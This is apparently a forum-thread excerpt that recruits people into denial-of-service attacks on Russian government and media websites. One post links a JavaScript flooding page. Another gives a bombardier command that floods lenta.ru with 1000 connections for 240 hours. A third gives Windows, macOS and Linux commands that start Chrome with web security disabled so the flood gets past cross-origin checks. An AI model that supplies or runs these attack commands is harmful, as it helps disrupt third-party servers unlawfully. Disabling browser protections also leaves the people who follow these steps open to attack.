1: Small website with simple JS to ddos a list of russian gov and propaganda websites. Works anywhere where those are not blocked (e.g. Ukraine). Link - https://stop-russian-desinformation.near.page/ 2. Console tool for unplanned load testing Link - https://github.com/codesenberg/bombardier/releases/tag/v1.2.... Example usage - ./bombardier-linux-amd64 --duration=240h --connections=1000 --latencies https://lenta.ru U…
Constantly errors by triggering cross-origin / access control checks in browser: is this intended and is the tool still effective in spite of this?
Windows: Right click on desktop, add new shortcut, Add the target as "[PATH_TO_CHROME]\chrome.exe" --disable-web-security --disable-gpu --user-data-dir=~/chromeTemp , Click OK.
OSX: open -n -a /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --args --user-data-dir="/tmp/chrome_dev_test" --disable-web-security Linux: google-chrome --disable-web-security